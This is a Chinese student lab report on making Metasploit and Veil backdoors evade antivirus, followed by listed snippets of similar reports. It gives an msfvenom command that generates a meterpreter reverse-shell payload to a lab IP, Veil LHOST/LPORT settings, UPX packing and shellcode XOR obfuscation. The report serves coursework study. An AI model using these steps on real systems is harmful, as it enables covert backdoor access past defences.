exp3免杀原理与实践20154302薛师凡

xueshifan xueshifan     2022-11-01     777

关键词:

Exp3 免杀原理与实践20154302薛师凡

一、实践目标与内容

利用多种工具实现实现恶意代码免杀
在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功。
在保证后门程序功能的情况下实现杀软共存。

二、实践过程与步骤

1.使用msf编码器生成的后门程序

上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的。

2.使用veil-evasion生成的后门程序

2.1安装veil平台
apt-get install veil-evasion


2.2根据菜单选择一个模板生成,在这里我选择的是evasion里的c语言中的(第7行)


2.3设置相关参数即

set LHOST 192.168.199.239

set LPORT 4302

generate

2.4找到生成的程序拷贝到主机后,没有被360查出来,virscan扫描有8个杀毒引擎识别了出来,还可以。

开始找不到生成的程序,可以在本地电脑搜索veil,找到var/lib下的veil,打开output->compiled,就可以找,后拖至主机。或者用指令复制cp -r 要复制的文件夹绝对地址 /root

然后回连试一试

3.shellcode编程

3.1在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.239 LPORT=4302 -f c

得到数组后开始编程。

3.3拷贝至win10,能直接被360识别出来,virscan扫描有6个引擎可以识别出来且能回连成功

3.4我对shellcode进行倒序,换位,异或,在win10环境下,在codeblock进行编译,不会被360识别出来,virscan也只有3个引擎能识别出来

4.对程序进行加壳

upx 4302.exe -o 4302upx.exe
实际并没有什么用,加壳后能识别出来的引擎数基本没变甚至还会变多

加壳后居然有12个引擎识别出来了:

三、基础问题回答

杀软是如何检测出恶意代码的?

我认为现在的杀软主要是基于特征码进行检测的,特征码就是一段或多段数据,如果一个可执行文件包含这样的数据或者文字名称则被认为是恶意代码。还有就是基于行为的恶意软件检测,就是通用的、多特征的、非精确的扫描。

免杀是做什么?

免杀即使杀毒软件检测不出恶意软件的手段。

免杀的基本方法有哪些?

通过多种方式改变特征码,例如加壳,生成shellcod,用其他语言进行重写再编译等等。
改变行为,例如改变通讯方式(使用反弹式连接)和操作模式(加入混淆作用的正常功能代码)。

四、离实战还缺些什么技术或步骤?

想办法让目标主机在不知不觉中运行恶意软件。毕竟没人会主动打开一个恶意软件。

五、实践总结与体会

通过这次实践,我们实现了部分恶意软件的免杀,虽然有时候回连会出现问题,但是这个过程其实不是很复杂,这简单的过程就让诸多杀毒软件束手就擒,这不禁让人为我们个人的信息安全感到恐慌。

exp5msf基础应用20154302薛师凡

Exp5MSF基础应用20154302薛师凡一、基础问题回答(1)用自己的话解释什么是exploit,payload,encode.exploit:是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。payload:就是被运... 查看详情

20155331exp3免杀原理与实践

20155331Exp3免杀原理与实践基础问题回答杀软是如何检测出恶意代码的?1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。免杀是做什么?让病毒不被杀毒软件杀掉。免杀的基本方法有哪些?1.改变特征码2... 查看详情

exp3-免杀原理与实践(代码片段)

Exp3-免杀原理与实践目录Exp3-免杀原理与实践1基础问题回答2实验环境3实践内容3.1正确使用msf编码器,使用msfvenom生成如jar之类的其他文件3.1.1检测实验2中生成的后门程序3.1.2编码一次3.1.2编码10次3.2生成jar文件3.3生成php文件3.4veil... 查看详情

20155302《网络对抗》exp3免杀原理与实践

20155302《网络对抗》Exp3免杀原理与实践实验要求1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了... 查看详情

exp3免杀原理与实践20164321王君陶

Exp3免杀原理与实践20164321王君陶1实验要求1.1正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)1.2通过组合应用各种技术实现恶意代码免杀(0.5... 查看详情

exp3免杀原理与实践20155113徐步桥

Exp3免杀原理实践1.实验目标1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)1.2通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言... 查看详情

20155338《网络对抗》exp3免杀原理与实践

20155338《网络对抗》Exp3免杀原理与实践实验过程一、免杀效果参考基准Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。二、使用msf编码器编码一次,在K... 查看详情

exp3免杀原理与实践

...为检测      -启发式检测类似(2)免杀是做什么?使恶意软件不被AV检测出来(3)免杀的基本方法有哪些?   改变特 查看详情

20155320exp3免杀原理与实践(代码片段)

20155320Exp3免杀原理与实践免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。【基础问题回答】(1)杀软是如何检测出恶意代码的?1.通过行为检测2.通过特征码的比对3.启发式检测(2... 查看详情

2017-2018-420155317《网络对抗技术》exp3免杀原理与实践

2017-2018-420155317《网络对抗技术》EXP3免杀原理与实践一、问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.实践(1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情

20165306exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践一、实践内容概述1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程2.通过组合应用各种技术实现恶意代码免杀3.用另一电脑实测,在杀软开启的情况下,可运行并回... 查看详情

20165218《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情

exp3免杀原理与实践20154301仉鑫烨(代码片段)

20154301Exp3免杀原理与实践仉鑫烨一、实践内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;通过组合应用各种技术实现恶意代码免杀;用另一电脑实测,在杀软开启的情... 查看详情

2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情

20165207exp3免杀原理与实践

Exp3免杀原理与实践1、实验内容1.1、使用msf1.1.1、确定基准线首先看kali的ip直接msfvenom的结果,不加其他的东西:使用VirusTotal得到的检测这个程序得到的结果:所以最终结果是69款软件中有49款检测出来了,49/69是基准线。1.1.2、使... 查看详情

20154307《网络对抗》exp3免杀原理与实践(代码片段)

20154307《网络对抗》Exp3免杀原理与实践一、基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。启发式恶意软件... 查看详情

20155330《网络攻防》exp3免杀原理与实践(代码片段)

20155330《网络攻防》Exp3免杀原理与实践基础问题回答杀软是如何检测出恶意代码的?基于特征码。先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码。基于行为。杀软通过检... 查看详情

exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面。这次的目标免杀平台是64位windows7SP1,我用... 查看详情